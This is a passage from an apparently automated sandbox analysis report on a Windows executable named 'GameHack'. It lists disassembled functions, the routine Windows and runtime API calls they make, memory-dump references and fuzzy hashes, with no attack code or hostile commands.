                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: DeleteFile
                                      • String ID:
                                      • API String ID: 4033686569-0
                                      • Opcode ID: fb0f1e8967dd2aff292fedc85b606b861d7a615f54aec1efcf15e14ae2af0bfd
                                      • Instruction ID: 2411633df085252dc702c934cefb81452505493a8ff449c8f5cc87890319aa45
                                      • Opcode Fuzzy Hash: fb0f1e8967dd2aff292fedc85b606b861d7a615f54aec1efcf15e14ae2af0bfd
                                      • Instruction Fuzzy Hash: F4E0927564220DABDB11AF60DC41FE9779CFB08385F485076B888E3260DB61DE95AA90
                                      Function 00EEA39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • GdiplusShutdown.GDIPLUS(?,?,?,?,00F01FA1,000000FF), ref: 00EEA3D1
                                      • CoUninitialize.COMBASE(?,?,?,?,00F01FA1,000000FF), ref: 00EEA3D6
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: GdiplusShutdownUninitialize
                                      • String ID:
                                      • API String ID: 3856339756-0
                                      • Opcode ID: 15c4f61ece680c72279903ac5fb2e0f612d0c45c117f8160d1bd0ae6027a59cb
                                      • Instruction ID: b3608e4a450a77d514acef19f955c4fab6feb21698a5b422ed150ee3c2c94215
                                      • Opcode Fuzzy Hash: 15c4f61ece680c72279903ac5fb2e0f612d0c45c117f8160d1bd0ae6027a59cb
                                      • Instruction Fuzzy Hash: E6F0ED32A08658EFC700EF4CDD01B09FBADFB88B20F00436AF409837A0CB34A800DA81
                                      Function 00EDA194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00EDA189,?,00ED76B2,?,?,?,?), ref: 00EDA1A5
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00EDA189,?,00ED76B2,?,?,?,?), ref: 00EDA1D1
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: c32cd1aebafe45f04694a9abdea5209c2c155211e3c9aceb54dc69f0e376c866
                                      • Instruction ID: 37e02b0a71123b0b823dc9d79efd7538fbd5af6803a340dd5f58adebfc93bbf4
                                      • Opcode Fuzzy Hash: c32cd1aebafe45f04694a9abdea5209c2c155211e3c9aceb54dc69f0e376c866
                                      • Instruction Fuzzy Hash: DCE06D7550112C9BDF20AA689C05BD9B79CEB083A5F0452A2BD94E3290DA70DE459AE0
                                      Function 00EE0085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EE00A0
                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00EDEB86,Crypt32.dll,00000000,00EDEC0A,?,?,00EDEBEC,?,?,?), ref: 00EE00C2
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystem
                                      • String ID:
                                      • API String ID: 1175261203-0
                                      • Opcode ID: 8197ac42ab50165d277bb602c0f5a025c5d550a50e338d1d0456c750e3a99985
                                      • Instruction ID: 1aa2444514ce06c0e434a96d0da356cd586458e00f7d1faa9f14668b0c8b739b
                                      • Opcode Fuzzy Hash: 8197ac42ab50165d277bb602c0f5a025c5d550a50e338d1d0456c750e3a99985
                                      • Instruction Fuzzy Hash: 94E0127690115CAADB219AA5AC05FD6B7ACFF09392F0404A6B948E3104DAB49A848BA0
                                      Function 00EE9B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00EE9B30
                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00EE9B37
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: BitmapCreateFromGdipStream
                                      • String ID:
                                      • API String ID: 1918208029-0
                                      • Opcode ID: 4525f37c2b0ef976fdeb32fe9fc2c08976144d68254a88074e70bfd45274065f
                                      • Instruction ID: eb5f3fee7e84354eac9a2dc574e4a5a47359802485038ee2fe462d5a7185f2fe
                                      • Opcode Fuzzy Hash: 4525f37c2b0ef976fdeb32fe9fc2c08976144d68254a88074e70bfd45274065f
                                      • Instruction Fuzzy Hash: 96E0ED7190121CEBCB20DF99E501699B7E8EB08321F10905BE995A3311E6B16E04AB95
                                      Function 00EF215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00EF329A: try_get_function.LIBVCRUNTIME ref: 00EF32AF
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EF217A
                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00EF2185
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                      • String ID:
                                      • API String ID: 806969131-0
                                      • Opcode ID: afccfcc59e04a28da77d1cafdee620c36a80dc3176005179e12c8c47324bff6b
                                      • Instruction ID: 5cbad3863081aa1993fd2fbf6e23530a485024b5fed42b1ca005a461029610ee
                                      • Opcode Fuzzy Hash: afccfcc59e04a28da77d1cafdee620c36a80dc3176005179e12c8c47324bff6b
                                      • Instruction Fuzzy Hash: 9ED0A92520A30E247E0826B068420F82384A852BB83E03B8EE320BA0E1EF118204B01A
                                      Function 00EEDC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • DloadLock.DELAYIMP ref: 00EEDC73
                                      • DloadProtectSection.DELAYIMP ref: 00EEDC8F
                                        • Part of subcall function 00EEDE67: DloadObtainSection.DELAYIMP ref: 00EEDE77
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Dload$Section$LockObtainProtect
                                      • String ID:
                                      • API String ID: 731663317-0
                                      • Opcode ID: bc672ea53b99b26f8eb3e170cb3195d2dd53f192c11f34c5191659381159d886
                                      • Instruction ID: 3fff6dea4096d6e66ca69488043487899f13627a76722416262f7f74479ca705
                                      • Opcode Fuzzy Hash: bc672ea53b99b26f8eb3e170cb3195d2dd53f192c11f34c5191659381159d886
                                      • Instruction Fuzzy Hash: 80D0C9705082CC4AC211EB169D5A75D72B1B7047D9F643602A106F76A4DFE44480E606
                                      Function 00ED12E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ItemShowWindow
                                      • String ID:
                                      • API String ID: 3351165006-0
                                      • Opcode ID: 7e863e54004dacd7bb24c49ab950e5f94e09a0834ea27a9da87417ba87859e18
                                      • Instruction ID: 3b909c082d538ba616f2a0ecbdd465293a1d41e3409c5500210f047450c8e9f7
                                      • Opcode Fuzzy Hash: 7e863e54004dacd7bb24c49ab950e5f94e09a0834ea27a9da87417ba87859e18
                                      • Instruction Fuzzy Hash: 12C01232058208BECB412BB0ED09D2FBBAABBA4222F05C908B6A5C0060C238C010EB11
                                      Function 00ED19A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 84d40d658977893bb116c4303a06f10178ee53bd0fe668cff28e815ca497582f
                                      • Instruction ID: c758ced28fc0a8a106bd47e2f16f18bca5b96ce9873b75edaca8d6ae7507a6de
                                      • Opcode Fuzzy Hash: 84d40d658977893bb116c4303a06f10178ee53bd0fe668cff28e815ca497582f
                                      • Instruction Fuzzy Hash: D3C19030A04254AFEF15CF68C494BA97BA5EF06314F1860FBDC45AB386DB319946CB61
                                      Function 00ED3B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 2b744c657bb33540fd932d38f1c5eb91f782cea72f7fee52ed689e5b470453cd
                                      • Instruction ID: 41cfe9ba615d5e0121f6760adbe61242a0784ea97d871988de378d043f2c64c7
                                      • Opcode Fuzzy Hash: 2b744c657bb33540fd932d38f1c5eb91f782cea72f7fee52ed689e5b470453cd
                                      • Instruction Fuzzy Hash: 6671CE71100B449EDB25DF30CC41AEBB7E9EF14301F44596FE5AB67242DA326A4ADF12
                                      Function 00ED837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED8384
                                        • Part of subcall function 00ED1380: __EH_prolog.LIBCMT ref: 00ED1385
                                        • Part of subcall function 00ED1380: new.LIBCMT ref: 00ED13FE
                                        • Part of subcall function 00ED19A6: __EH_prolog.LIBCMT ref: 00ED19AB
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 1c290975bcd00a2323d4d7f6105e13eacfb7bef737567c4fda561d5c8bc245d5
                                      • Instruction ID: 14f3ae089138688bd38d5ff0203eb024ef177c68ec7055d81eb8f34b4c0cf98a
                                      • Opcode Fuzzy Hash: 1c290975bcd00a2323d4d7f6105e13eacfb7bef737567c4fda561d5c8bc245d5
                                      • Instruction Fuzzy Hash: F741D2318406589ADB20DB60CD51BEA73A8EF10304F0450EBE59AB3293DF755ECADB50
                                      Function 00ED1E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED1E05
                                        • Part of subcall function 00ED3B3D: __EH_prolog.LIBCMT ref: 00ED3B42
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 556f6aa515134a90792e6eb107bb72eb793a03a2a7355bc396142686a0cea3c8
                                      • Instruction ID: dd0f34dfb2e8b32725ece4c2bccf4f9ab0565868e9356af1636cb7aded3f21b9
                                      • Opcode Fuzzy Hash: 556f6aa515134a90792e6eb107bb72eb793a03a2a7355bc396142686a0cea3c8
                                      • Instruction Fuzzy Hash: 2D212472904248AECB15EFA9D9419EEFBF6FF58300B1011AEE845B7351CB325E11DB60
                                      Function 00EEA7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00EEA7C8
                                        • Part of subcall function 00ED1380: __EH_prolog.LIBCMT ref: 00ED1385
                                        • Part of subcall function 00ED1380: new.LIBCMT ref: 00ED13FE
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 70cb377b2bb7fb191881b3aa4b0fff3bd378966d7eb6bed672d768373f0753d0
                                      • Instruction ID: 425cb6ff825096e18c250b0e3f208303906da2beeb760d7001968bb1d3303a63
                                      • Opcode Fuzzy Hash: 70cb377b2bb7fb191881b3aa4b0fff3bd378966d7eb6bed672d768373f0753d0
                                      • Instruction Fuzzy Hash: 19215A71C0428DAACB15DF95C9529EEBBF4EF19304F0414EEE809B7242DB356E069BA1
                                      Function 00ED92E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 945da790822ba056aab63a82323d0dd8a72e7d1220a0d6a9b9aa19b37571c841
                                      • Instruction ID: 9daec5cdcd9486ff48b313e9ed186da0d4a3c73db95841bcb338374f4cc5f91a
                                      • Opcode Fuzzy Hash: 945da790822ba056aab63a82323d0dd8a72e7d1220a0d6a9b9aa19b37571c841
                                      • Instruction Fuzzy Hash: D3118E73A10529ABCF22AFA8CC419DEB776EF48750F055116F805B7392DA358D1287A0
                                      Function 00EFBB8A Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00EF85A9: RtlAllocateHeap.NTDLL(00000008,00F03958,00000000,?,00EF905A,00000001,00000364,?,?,?,00EDD25E,?,00BB1600,00000063,00000004,00EDCFE0), ref: 00EF85EA
                                      • _free.LIBCMT ref: 00EFBBF6
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                                      • Instruction ID: a41e0b7e1888a3a459e07ef095405b67add4e149b4c218613f2e6e2c8e78e411
                                      • Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                                      • Instruction Fuzzy Hash: 4D01F97320430D6BE3218F65D88596AFBEDFB85370F25052DE694A3280EB30A805C774
                                      Function 00EDAA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                      • Instruction ID: 101190c3399c99176361ade6981bccf9596980df4c60d2e5e158a44a2df56f1f
                                      • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                      • Instruction Fuzzy Hash: 4BF08C315007069FDB30DE65C94561AB7E8EB25324F289A2BE4A6E2790E771DA82C742
                                      Function 00EF85A9 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,00F03958,00000000,?,00EF905A,00000001,00000364,?,?,?,00EDD25E,?,00BB1600,00000063,00000004,00EDCFE0), ref: 00EF85EA
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 0eb6bc2519836153d8e2e820eed39a93b4a599d9a3495fb593eb1892b074deb0
                                      • Instruction ID: 9b68be47654eac887991eef86d7383820d74188d90e89221942603b78b26e079
                                      • Opcode Fuzzy Hash: 0eb6bc2519836153d8e2e820eed39a93b4a599d9a3495fb593eb1892b074deb0
